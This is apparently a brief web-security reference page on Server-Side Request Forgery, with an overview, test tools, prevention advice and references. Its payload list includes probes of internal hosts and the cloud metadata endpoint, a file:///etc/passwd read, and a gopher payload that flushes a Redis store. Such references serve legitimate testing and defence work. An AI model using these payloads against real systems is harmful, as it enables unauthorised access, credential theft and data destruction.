Ssrf

Overview

Server-Side Request Forgery (SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to unintended locations. In a typical SSRF attack, the attacker exploits a server to access internal systems that are not directly accessible from the external network.

SSRF attacks frequently target cloud metadata endpoints (169.254.169.254), internal services, and localhost applications.

Category: Web — Web application enumeration and exploitation techniques.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Ssrf:

http://127.0.0.1:8080/admin

http://localhost

http://[::1]:80

http://0.0.0.0:22

http://169.254.169.254/

file:///etc/passwd

gopher://localhost:6379/_*1%0d%0a$8%0d%0aFLUSHALL

dict://localhost:6379/info

Tools & Techniques

Recommended tools for Ssrf:

• Test parameters: url, uri, file, path, dest, redirect, src, source, href, data, target
• SSRFmap: automated SSRF exploitation framework
• Gopherus: generate gopher payloads for SSRF
• Burp Collaborator: out-of-band SSRF detection

Prevention & Mitigation

Security recommendations to prevent Ssrf:

• Implement URL allowlists and block private IP ranges
• Disable unused URL schemes (file, gopher, dict)
• Use a network firewall to restrict outbound traffic
• Validate and sanitize redirect URLs
• Run backend services on separate network segments

References

Additional resources:

• https://portswigger.net/web-security/ssrf
• https://github.com/swisskyrepo/SSRFmap
• https://owasp.org/www-community/attacks/Server_Side_Request_Forgery